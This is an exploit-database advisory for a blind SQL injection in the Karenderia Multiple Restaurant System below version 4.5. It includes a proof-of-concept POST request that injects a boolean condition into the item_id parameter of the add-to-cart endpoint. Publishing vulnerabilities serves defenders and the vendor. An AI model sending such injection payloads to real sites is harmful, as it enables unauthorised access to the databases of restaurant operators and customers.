Karenderia Multiple Restaurant System < 4.5 Blind SQL Injection

2018.05.22
Credit: telahdihapus
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Karenderia Multiple Restaurant System < 4.5 - Blind SQL injection # Google Dork: N/A # Date: 2018-05-10 # Exploit Author: telahdihapus # Email Author: ferdinanprasetya@gmail.com # Vendor Homepage: https://codecanyon.net/user/bastikikang # Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694 # Tested on: kali linux # 1. description : # When the user/attacker will add items to the cart, the attacker can intercept the data post, and add sql injection to the item_id parameter. # 2. POC : POST : /admin/ajax host : http://victim.com/ action=addToCart&item_id=1' and '1'='1&row=&merchant_id=1&discount=&currentController=store&category_id=171&price=14.50&qty=2&notes=&require_addon_86=2&sub_item%5B86%5D%5B%5D=376%7C2%7CFried+Rice+%26+Fries%7C


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top